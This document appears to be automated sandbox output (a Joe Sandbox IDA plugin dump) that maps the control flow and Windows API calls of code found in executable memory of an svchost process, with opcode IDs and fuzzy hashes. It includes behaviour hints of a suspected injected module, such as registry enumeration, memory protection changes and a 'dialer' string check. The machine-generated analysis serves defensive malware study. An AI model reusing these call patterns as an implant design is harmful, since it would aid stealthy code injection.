14116->14076 14117->14078 14119 179537a1334 GetProcessHeap HeapAlloc 14118->14119 14120 179537a1499 RegCloseKey 14118->14120 14121 179537a1485 GetProcessHeap HeapFree 14119->14121 14122 179537a135d RegEnumValueW 14119->14122 14120->14083 14121->14120 14123 179537a13af 14122->14123 14123->14121 14123->14122 14125 179537a142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14123->14125 14126 179537a13dd GetProcessHeap HeapAlloc 14123->14126 14127 179537a1413 GetProcessHeap HeapFree 14123->14127 14134 179537a1554 14123->14134 14125->14123 14126->14123 14127->14125 14129 179537a11b5 RegCloseKey 14128->14129 14131 179537a10b9 14128->14131 14129->14085 14130 179537a10c7 RegEnumValueW 14130->14131 14131->14129 14131->14130 14132 179537a1149 GetProcessHeap HeapAlloc 14131->14132 14133 179537a117f GetProcessHeap HeapFree 14131->14133 14132->14131 14133->14131 14135 179537a15a4 14134->14135 14136 179537a156e 14134->14136 14135->14123 14136->14135 14137 179537a1585 StrCmpIW 14136->14137 14138 179537a158d StrCmpW 14136->14138 14137->14136 14138->14136 14139 179537aa568 14140 179537aa581 14139->14140 14141 179537aa57d 14139->14141 14151 179537acc38 14140->14151 14146 179537aa593 14148 179537ab8d8 __free_lconv_mon 7 API calls 14146->14148 14148->14141 14152 179537aa586 14151->14152 14153 179537acc45 14151->14153 14157 179537ad130 GetEnvironmentStringsW 14152->14157 14193 179537ab2fc 14153->14193 14158 179537ad202 14157->14158 14159 179537ad15e 14157->14159 14160 179537aa58b 14158->14160 14161 179537ad20a FreeEnvironmentStringsW 14158->14161 14159->14159 14162 179537ad080 WideCharToMultiByte 14159->14162 14160->14146 14171 179537aa5d4 14160->14171 14161->14160 14163 179537ad1b0 14162->14163 14163->14158 14164 179537ad1b7 14163->14164 14165 179537aae0c 8 API calls 14164->14165 14166 179537ad1bf 14165->14166 14167 179537ad1e9 14166->14167 14168 179537ad080 WideCharToMultiByte 14166->14168 14169 179537ab8d8 __free_lconv_mon 7 API calls 14167->14169 14168->14167 14170 179537ad200 14169->14170 14170->14158 14172 179537aa5fb 14171->14172 14173 179537ab860 _set_errno_from_matherr 7 API calls 14172->14173 14183 179537aa630 14173->14183 14174 179537aa69f 14175 179537ab8d8 __free_lconv_mon 7 API calls 14174->14175 14176 179537aa5a0 14175->14176 14188 179537ab8d8 14176->14188 14177 179537ab860 _set_errno_from_matherr 7 API calls 14177->14183 14178 179537aa690 14656 179537aa6dc 14178->14656 14182 179537aa6c7 14186 179537ab740 _invalid_parameter_noinfo 10 API calls 14182->14186 14183->14174 14183->14177 14183->14178 14183->14182 14185 179537ab8d8 __free_lconv_mon 7 API calls 14183->14185 14647 179537aab34 14183->14647 14184 179537ab8d8 __free_lconv_mon 7 API calls 14184->14174 14185->14183 14187 179537aa6d9 14186->14187 14189 179537ab90f 14188->14189 14190 179537ab8dd HeapFree 14188->14190 14189->14146 14190->14189 14191 179537ab8f8 14190->14191 14192 179537ab840 _set_errno_from_matherr 6 API calls 14191->14192 14192->14189 14195 179537ab30d 14193->14195 14196 179537ab31a 14195->14196 14234 179537ad608 14195->14234 14202 179537ab394 14196->14202 14249 179537aab94 14196->14249 14197 179537ab331 14197->14196 14239 179537ab860 14197->14239 14216 179537ac9c0 14202->14216 14203 179537ab362 14206 179537ad608 _set_errno_from_matherr 4 API calls 14203->14206 14204 179537ab352 14205 179537ad608 _set_errno_from_matherr 4 API calls 14204->14205 14207 179537ab359 14205->14207 14208 179537ab36a 14206->14208 14212 179537ab8d8 __free_lconv_mon 7 API calls 14207->14212 14209 179537ab380 14208->14209 14210 179537ab36e 14208->14210 14245 179537aaf94 14209->14245 14213 179537ad608 _set_errno_from_matherr 4 API calls 14210->14213 14212->14196 14213->14207 14215 179537ab8d8 __free_lconv_mon 7 API calls 14215->14196 14505 179537acb80 14216->14505 14218 179537ac9e9 14516 179537ac6cc 14218->14516 14221 179537aca03 14221->14152 14224 179537ab8d8 __free_lconv_mon 7 API calls 14224->14221 14227 179537acaaa 14228 179537ab840 _set_errno_from_matherr 7 API calls 14227->14228 14230 179537acaaf 14228->14230 14229 179537acb0c 14229->14230 14540 179537ac510 14229->14540 14230->14224 14231 179537acacf 14231->14229 14232 179537ab8d8 __free_lconv_mon 7 API calls 14231->14232 14232->14229 14257 179537ad2cc 14234->14257 14236 179537ad636 14237 179537ad648 TlsSetValue 14236->14237 14238 179537ad640 14236->14238 14237->14238 14238->14197 14244 179537ab871 _set_errno_from_matherr 14239->14244 14240 179537ab8c2 14263 179537ab840 14240->14263 14241 179537ab8a6 HeapAlloc 14242 179537ab344 14241->14242 14241->14244 14242->14203 14242->14204 14244->14240 14244->14241 14246 179537ab046 _set_errno_from_matherr 14245->14246 14287 179537aaeec 14246->14287 14248 179537ab05b 14248->14196 14248->14215 14250 179537aab9d 14249->14250 14251 179537aabac 14250->14251 14407 179537adc58 14250->14407 14253 179537aabb5 IsProcessorFeaturePresent 14251->14253 14256 179537aabdf 14251->14256 14254 179537aabc4 14253->14254 14423 179537ab50c 14254->14423 14258 179537ad32d try_get_function 14257->14258 14261 179537ad328 try_get_function 14257->14261 14258->14236 14259 179537ad35c LoadLibraryExW 14259->14261 14260 179537ad3f5 FreeLibrary 14260->14261 14261->14258 14261->14259 14261->14260 14262 179537ad3b7 LoadLibraryExW 14261->14262 14262->14261 14266 179537ab3a4 14263->14266 14265 179537ab849 14265->14242 14268 179537ab3b9 try_get_function 14266->14268 14267 179537ad608 _set_errno_from_matherr 4 API calls 14269 179537ab3ee 14267->14269 14268->14267 14270 179537ab3d3 SetLastError 14268->14270 14269->14270 14272 179537ab860 _set_errno_from_matherr 6 API calls 14269->14272 14270->14265 14273 179537ab401 14272->14273 14274 179537ab41f 14273->14274 14275 179537ab40f 14273->14275 14277 179537ad608 _set_errno_from_matherr 4 API calls 14274->14277 14276 179537ad608 _set_errno_from_matherr 4 API calls 14275->14276 14284 179537ab416 14276->14284 14278 179537ab427 14277->14278 14279 179537ab42b 14278->14279 14280 179537ab43d 14278->14280 14281 179537ad608 _set_errno_from_matherr 4 API calls 14279->14281 14282 179537aaf94 _set_errno_from_matherr 6 API calls 14280->14282 14281->14284 14285 179537ab445 14282->14285 14283 179537ab8d8 __free_lconv_mon 6 API calls 14283->14270 14284->14283 14286 179537ab8d8 __free_lconv_mon 6 API calls 14285->14286 14286->14270 14288 179537aaf08 14287->14288 14291 179537ab17c 14288->14291 14290 179537aaf1e 14290->14248 14292 179537ab1c4 Concurrency::details::SchedulerProxy::DeleteThis 14291->14292 14293 179537ab198 Concurrency::details::SchedulerProxy::DeleteThis 14291->14293 14292->14290 14293->14292 14295 179537ae6e4 14293->14295 14296 179537ae707 14295->14296 14297 179537ae780 14295->14297 14296->14297 14301 179537ae746 14296->14301 14306 179537ab8d8 __free_lconv_mon 7 API calls 14296->14306 14298 179537ae7d3 14297->14298 14300 179537ab8d8 __free_lconv_mon 7 API calls 14297->14300 14361 179537ae884 14298->14361 14302 179537ae7a4 14300->14302 14303 179537ae768 14301->14303 14309 179537ab8d8 __free_lconv_mon 7 API calls 14301->14309 14304 179537ab8d8 __free_lconv_mon 7 API calls 14302->14304 14305 179537ab8d8 __free_lconv_mon 7 API calls 14303->14305 14307 179537ae7b8 14304->14307 14311 179537ae774 14305->14311 14312 179537ae73a 14306->14312 14308 179537ab8d8 __free_lconv_mon 7 API calls 14307->14308 14313 179537ae7c7 14308->14313 14314 179537ae75c 14309->14314 14310 179537ae83e 14315 179537ab8d8 __free_lconv_mon 7 API calls 14311->14315 14321 179537b0e98 14312->14321 14318 179537ab8d8 __free_lconv_mon 7 API calls 14313->14318 14349 179537b0fa4 14314->14349 14315->14297 14317 179537ab8d8 7 API calls __free_lconv_mon 14320 179537ae7df 14317->14320 14318->14298 14320->14310 14320->14317 14322 179537b0f9c 14321->14322 14323 179537b0ea1 14321->14323 14322->14301 14324 179537b0ebb 14323->14324 14325 179537ab8d8 __free_lconv_mon 7 API calls 14323->14325 14326 179537b0ecd 14324->14326 14327 179537ab8d8 __free_lconv_mon 7 API calls 14324->14327 14325->14324 14328 179537b0edf 14326->14328 14329 179537ab8d8 __free_lconv_mon 7 API calls 14326->14329 14327->14326 14330 179537b0ef1 14328->14330 14331 179537ab8d8 __free_lconv_mon 7 API calls 14328->14331 14329->14328 14332 179537b0f03 14330->14332 14333 179537ab8d8 __free_lconv_mon 7 API calls 14330->14333 14331->14330 14334 179537b0f15 14332->14334 14335 179537ab8d8 __free_lconv_mon 7 API calls 14332->14335 14333->14332 14336 179537b0f27 14334->14336 14337 179537ab8d8 __free_lconv_mon 7 API calls 14334->14337 14335->14334 14338 179537b0f39 14336->14338 14339 179537ab8d8 __free_lconv_mon 7 API calls 14336->14339 14337->14336 14340 179537b0f4b 14338->14340 14342 179537ab8d8 __free_lconv_mon 7 API calls 14338->14342 14339->14338 14341 179537b0f5d 14340->14341 14343 179537ab8d8 __free_lconv_mon 7 API calls 14340->14343 14344 179537b0f72 14341->14344 14345 179537ab8d8 __free_lconv_mon 7 API calls 14341->14345 14342->14340 14343->14341 14346 179537b0f87 14344->14346 14347 179537ab8d8 __free_lconv_mon 7 API calls 14344->14347 14345->14344 14346->14322 14348 179537ab8d8 __free_lconv_mon 7 API calls 14346->14348 14347->14346 14348->14322 14350 179537b0fa9 14349->14350 14359 179537b100a 14349->14359 14351 179537ab8d8 __free_lconv_mon 7 API calls 14350->14351 14353 179537b0fc2 14350->14353 14351->14353 14352 179537b0fd4 14355 179537b0fe6 14352->14355 14356 179537ab8d8 __free_lconv_mon 7 API calls 14352->14356 14353->14352 14354 179537ab8d8 __free_lconv_mon 7 API calls 14353->14354 14354->14352 14357 179537b0ff8 14355->14357 14358 179537ab8d8 __free_lconv_mon 7 API calls 14355->14358 14356->14355 14357->14359 14360 179537ab8d8 __free_lconv_mon 7 API calls 14357->14360 14358->14357 14359->14303 14360->14359 14362 179537ae8b4 14361->14362 14363 179537ae889 14361->14363 14362->14320 14363->14362 14367 179537b1068 14363->14367 14366 179537ab8d8 __free_lconv_mon 7 API calls 14366->14362 14368 179537b1071 14367->14368 14369 179537ae8ac 14367->14369 14403 179537b1010 14368->14403 14369->14366 14372 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14373 179537b109a 14372->14373 14374 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14373->14374 14375 179537b10a8 14374->14375 14376 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14375->14376 14377 179537b10b6 14376->14377 14378 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14377->14378 14379 179537b10c5 14378->14379 14380 179537ab8d8 __free_lconv_mon 7 API calls 14379->14380 14381 179537b10d1 14380->14381 14382 179537ab8d8 __free_lconv_mon 7 API calls 14381->14382 14383 179537b10dd 14382->14383 14384 179537ab8d8 __free_lconv_mon 7 API calls 14383->14384 14385 179537b10e9 14384->14385 14386 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14385->14386 14387 179537b10f7 14386->14387 14388 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14387->14388 14389 179537b1105 14388->14389 14390 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14389->14390 14391 179537b1113 14390->14391 14392 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14391->14392 14393 179537b1121 14392->14393 14394 179537b1010 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14393->14394 14395 179537b1130 14394->14395 14396 179537ab8d8 __free_lconv_mon 7 API calls 14395->14396 14397 179537b113c 14396->14397 14398 179537ab8d8 __free_lconv_mon 7 API calls 14397->14398 14399 179537b1148 14398->14399 14400 179537ab8d8 __free_lconv_mon 7 API calls 14399->14400 14401 179537b1154 14400->14401 14402 179537ab8d8 __free_lconv_mon 7 API calls 14401->14402 14402->14369 14404 179537b1044 14403->14404 14405 179537b1058 14403->14405 14404->14405 14406 179537ab8d8 __free_lconv_mon 7 API calls 14404->14406 14405->14372 14406->14404 14408 179537adc80 14407->14408 14417 179537adca1 14407->14417 14409 179537ab3a4 _set_errno_from_matherr 7 API calls 14408->14409 14411 179537adc94 14408->14411 14408->14417 14409->14411 14410 179537adcde 14410->14251 14411->14410 14412 179537add1e 14411->14412 14411->14417 14413 179537ab840 _set_errno_from_matherr 7 API calls 14412->14413 14414 179537add23 14413->14414 14431 179537ab720 14414->14431 14415 179537adea9 14417->14415 14419 179537adde7 14417->14419 14434 179537ab228 14417->14434 14422 179537ab228 19 API calls 14419->14422 14420 179537addd7 14421 179537ab228 19 API calls 14420->14421 14421->14419 14422->14419 14424 179537ab546 capture_previous_context _invalid_parameter_noinfo 14423->14424 14425 179537ab58b RtlLookupFunctionEntry 14424->14425 14426 179537ab5a8 RtlVirtualUnwind 14425->14426 14427 179537ab5de IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14425->14427 14426->14427 14428 179537ab630 _invalid_parameter_noinfo 14427->14428 14493 179537a7a20 14428->14493 14430 179537ab64f 14430->14256 14480 179537ab670 14431->14480 14433 179537ab739 14433->14410 14436 179537ab23d try_get_function 14434->14436 14435 179537ad608 _set_errno_from_matherr 4 API calls 14437 179537ab272 14435->14437 14436->14435 14438 179537ab257 SetLastError 14436->14438 14437->14438 14440 179537ab860 _set_errno_from_matherr 7 API calls 14437->14440 14442 179537ab2f6 14438->14442 14443 179537ab2e6 14438->14443 14441 179537ab285 14440->14441 14444 179537ab2a3 14441->14444 14445 179537ab293 14441->14445 14446 179537aab94 18 API calls 14442->14446 14443->14420 14448 179537ad608 _set_errno_from_matherr 4 API calls 14444->14448 14447 179537ad608 _set_errno_from_matherr 4 API calls 14445->14447 14457 179537ab2fb 14446->14457 14450 179537ab29a 14447->14450 14449 179537ab2ab 14448->14449 14451 179537ab2c1 14449->14451 14452 179537ab2af 14449->14452 14456 179537ab8d8 __free_lconv_mon 7 API calls 14450->14456 14455 179537aaf94 _set_errno_from_matherr 7 API calls 14451->14455 14453 179537ad608 _set_errno_from_matherr 4 API calls 14452->14453 14453->14450 14454 179537ad608 _set_errno_from_matherr 4 API calls 14458 179537ab331 14454->14458 14459 179537ab2c9 14455->14459 14456->14438 14457->14454 14460 179537ab31a 14457->14460 14458->14460 14463 179537ab860 _set_errno_from_matherr 7 API calls 14458->14463 14461 179537ab8d8 __free_lconv_mon 7 API calls 14459->14461 14462 179537aab94 18 API calls 14460->14462 14466 179537ab394 14460->14466 14461->14438 14464 179537ab3a2 14462->14464 14465 179537ab344 14463->14465 14467 179537ab362 14465->14467 14468 179537ab352 14465->14468 14466->14420 14470 179537ad608 _set_errno_from_matherr 4 API calls 14467->14470 14469 179537ad608 _set_errno_from_matherr 4 API calls 14468->14469 14471 179537ab359 14469->14471 14472 179537ab36a 14470->14472 14476 179537ab8d8 __free_lconv_mon 7 API calls 14471->14476 14473 179537ab380 14472->14473 14474 179537ab36e 14472->14474 14475 179537aaf94 _set_errno_from_matherr 7 API calls 14473->14475 14477 179537ad608 _set_errno_from_matherr 4 API calls 14474->14477 14478 179537ab388 14475->14478 14476->14460 14477->14471 14478->14460 14479 179537ab8d8 __free_lconv_mon 7 API calls 14478->14479 14479->14460 14481 179537ab3a4 _set_errno_from_matherr 7 API calls 14480->14481 14482 179537ab695 14481->14482 14485 179537ab6a6 14482->14485 14488 179537ab740 IsProcessorFeaturePresent 14482->14488 14485->14433 14489 179537ab753 14488->14489 14490 179537ab50c _invalid_parameter_noinfo 8 API calls 14489->14490 14491 179537ab76e _invalid_parameter_noinfo 14490->14491 14492 179537ab774 TerminateProcess 14491->14492 14494 179537a7a29 14493->14494 14495 179537a7a34 14494->14495 14496 179537a820c IsProcessorFeaturePresent 14494->14496 14495->14430 14497 179537a8224 14496->14497 14500 179537a8400 14497->14500 14499 179537a8237 14499->14430 14501 179537a8411 capture_previous_context 14500->14501 14502 179537a841a RtlLookupFunctionEntry 14501->14502 14503 179537a8469 14502->14503 14504 179537a8430 RtlVirtualUnwind 14502->14504 14503->14499 14504->14502 14504->14503 14509 179537acba3 14505->14509 14506 179537acbad 14507 179537acc1f 14506->14507 14508 179537aab94 19 API calls 14506->14508 14507->14218 14510 179537acc37 14508->14510 14509->14506 14512 179537ab8d8 __free_lconv_mon 7 API calls 14509->14512 14511 179537acc8a 14510->14511 14513 179537ab2fc 19 API calls 14510->14513 14511->14218 14512->14506 14514 179537acc74 14513->14514 14515 179537ac9c0 28 API calls 14514->14515 14515->14511 14552 179537aabec 14516->14552 14519 179537ac6ec GetOEMCP 14521 179537ac713 14519->14521 14520 179537ac6fe 14520->14521 14522 179537ac703 GetACP 14520->14522 14521->14221 14523 179537aae0c 14521->14523 14522->14521 14524 179537aae57 14523->14524 14528 179537aae1b _set_errno_from_matherr 14523->14528 14525 179537ab840 _set_errno_from_matherr 7 API calls 14524->14525 14527 179537aae55 14525->14527 14526 179537aae3e HeapAlloc 14526->14527 14526->14528 14527->14230 14529 179537accb4 14527->14529 14528->14524 14528->14526 14530 179537ac6cc 21 API calls 14529->14530 14531 179537accdf 14530->14531 14533 179537acd1c IsValidCodePage 14531->14533 14538 179537acd5f 14531->14538 14532 179537a7a20 _handle_error 3 API calls 14534 179537acaa3 14532->14534 14535 179537acd2d 14533->14535 14533->14538 14534->14227 14534->14231 14536 179537acd64 GetCPInfo 14535->14536 14539 179537acd36 14535->14539 14536->14538 14536->14539 14538->14532 14583 179537ac7dc 14539->14583 14541 179537ac52c 14540->14541 14542 179537ab840 _set_errno_from_matherr 7 API calls 14541->14542 14545 179537ac54f 14541->14545 14543 179537ac5be 14542->14543 14544 179537ab720 _invalid_parameter_noinfo 17 API calls 14543->14544 14544->14545 14546 179537ab840 _set_errno_from_matherr 7 API calls 14545->14546 14550 179537ac5f7 14545->14550 14547 179537ac655 14546->14547 14548 179537ab720 _invalid_parameter_noinfo 17 API calls 14547->14548 14548->14550 14549 179537ac691 14549->14230 14550->14549 14551 179537ab8d8 __free_lconv_mon 7 API calls 14550->14551 14551->14549 14553 179537aac0b 14552->14553 14554 179537aac10 14552->14554 14553->14519 14553->14520 14554->14553 14555 179537ab228 19 API calls 14554->14555 14556 179537aac2b 14555->14556 14560 179537ae4e4 14556->14560 14561 179537aac4e 14560->14561 14562 179537ae4f9 14560->14562 14564 179537ae518 14561->14564 14562->14561 14568 179537ae98c 14562->14568 14565 179537ae540 14564->14565 14566 179537ae52d 14564->14566 14565->14553 14566->14565 14580 179537acc98 14566->14580 14569 179537ab228 19 API calls 14568->14569 14571 179537ae99b 14569->14571 14570 179537ae9e6 14570->14561 14571->14570 14576 179537ae9fc 14571->14576 14573 179537ae9d4 14573->14570 14574 179537aab94 19 API calls 14573->14574 14575 179537ae9f9 14574->14575 14577 179537aea0e Concurrency::details::SchedulerProxy::DeleteThis 14576->14577 14579 179537aea1b 14576->14579 14578 179537ae6e4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 14577->14578 14577->14579 14578->14579 14579->14573 14581 179537ab228 19 API calls 14580->14581 14582 179537acca1 14581->14582 14584 179537ac819 GetCPInfo 14583->14584 14593 179537ac90f 14583->14593 14590 179537ac82c 14584->14590 14584->14593 14585 179537a7a20 _handle_error 3 API calls 14587 179537ac9a8 14585->14587 14587->14538 14594 179537af3f4 14590->14594 14592 179537af89c 22 API calls 14592->14593 14593->14585 14595 179537aabec 19 API calls 14594->14595 14596 179537af436 14595->14596 14597 179537af473 14596->14597 14599 179537aae0c 8 API calls 14596->14599 14601 179537af498 14596->14601 14598 179537a7a20 _handle_error 3 API calls 14597->14598 14600 179537ac8a3 14598->14600 14599->14601 14605 179537af89c 14600->14605 14602 179537af530 14601->14602 14604 179537af516 GetStringTypeW 14601->14604 14602->14597 14603 179537ab8d8 __free_lconv_mon 7 API calls 14602->14603 14603->14597 14604->14602 14606 179537aabec 19 API calls 14605->14606 14607 179537af8c1 14606->14607 14610 179537af584 14607->14610 14613 179537af5c6 14610->14613 14611 179537af84f 14612 179537a7a20 _handle_error 3 API calls 14611->14612 14614 179537ac8d6 14612->14614 14613->14611 14615 179537aae0c 8 API calls 14613->14615 14616 179537af643 14613->14616 14614->14592 14615->14616 14617 179537af747 14616->14617 14634 179537ad6c0 14616->14634 14617->14611 14619 179537ab8d8 __free_lconv_mon 7 API calls 14617->14619 14619->14611 14620 179537af6ef 14620->14617 14621 179537af704 14620->14621 14622 179537af756 14620->14622 14621->14617 14624 179537ad6c0 4 API calls 14621->14624 14623 179537aae0c 8 API calls 14622->14623 14625 179537af770 14622->14625 14623->14625 14624->14617 14625->14617 14626 179537ad6c0 4 API calls 14625->14626 14629 179537af7f1 14626->14629 14627 179537af826 14627->14617 14628 179537ab8d8 __free_lconv_mon 7 API calls 14627->14628 14628->14617 14629->14627 14640 179537ad080 14629->14640 14635 179537ad2cc try_get_function 3 API calls 14634->14635 14636 179537ad6fe 14635->14636 14639 179537ad703 14636->14639 14644 179537ad79c 14636->14644 14638 179537ad75f LCMapStringW 14638->14639 14639->14620 14641 179537ad0a3 WideCharToMultiByte 14640->14641 14643 179537b30b0 14641->14643 14645 179537ad2cc try_get_function 3 API calls 14644->14645 14646 179537ad7ca 14645->14646 14646->14638 14648 179537aab41 14647->14648 14649 179537aab4b 14647->14649 14648->14649 14653 179537aab66 14648->14653 14650 179537ab840 _set_errno_from_matherr 7 API calls 14649->14650 14651 179537aab52 14650->14651 14652 179537ab720 _invalid_parameter_noinfo 17 API calls 14651->14652 14654 179537aab5e 14652->14654 14653->14654 14655 179537ab840 _set_errno_from_matherr 7 API calls 14653->14655 14654->14183 14655->14651 14657 179537aa6e1 14656->14657 14658 179537aa698 14656->14658 14659 179537aa70a 14657->14659 14660 179537ab8d8 __free_lconv_mon 7 API calls 14657->14660 14658->14184 14661 179537ab8d8 __free_lconv_mon 7 API calls 14659->14661 14660->14657 14661->14658 14662 17953772908 14665 17953772936 14662->14665 14663 17953772a2b LoadLibraryA 14663->14665 14664 17953772aa7 14665->14663 14665->14664

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 6e7ad4a23ee113c94972afa18e5892f6c1cf9dab88b3806c5c8dc1af32ac5ff3
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 2AE039B1A11A14C6F7058BA2D82438937F5EB89B06F488024C90907350EF7D84D9C740

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 23a82a55378c246d0ec841d76e9cecdd68e5164837a20dfb0eba84c5fef6eec4
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: FE115B71E3C63182F7639BA1B8563E923F0EB5670DF54012B9A4E86B94EF39C08CC650

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free
                                                • String ID:
                                                • API String ID: 3328510275-0
                                                • Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                • Instruction ID: 79042b1d93504cc8c4419d3936fb3a924f44f0128a7a967f3d6c629648fc6a81
                                                • Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                • Instruction Fuzzy Hash: 8F21CC31F28BA481E6219F16A45029AB7B4F78AFD4F4D4126DF9D63BD4DF38C5568300

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00000179537A1650: GetProcessHeap.KERNEL32 ref: 00000179537A165B
                                                  • Part of subcall function 00000179537A1650: HeapAlloc.KERNEL32 ref: 00000179537A166A
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DA
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1707
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1721
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1741
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A175C
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A177C
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1797
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17B7
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A17D2
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17F2
                                                • Sleep.KERNEL32 ref: 00000179537A1C43
                                                • SleepEx.KERNEL32 ref: 00000179537A1C49
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A180D
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A182D
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1848
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1868
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1883
                                                  • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A18A3
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18BE
                                                  • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18C8
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: d488d6aa4593b88235e9775f50eab7aee9e96ec915b67486a12f707cea035321
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 65311239B2862191FB529F36E9513EA13F5AB46BDCF844023DE0F977D6EE24C858C250

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 81 179537a3930-179537a393b 82 179537a3955-179537a395c 81->82 83 179537a393d-179537a3950 StrCmpNIW 81->83 83->82 84 179537a3952 83->84 84->82
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 3f8ff65858361c2d21231e026d063f1c7926eae38b6c62a91ddaf41afc421b43
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: 00D0A730B2961B86FF66DFE188E16E02370EB0670CF448033CA0902714EB198DCDCB10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
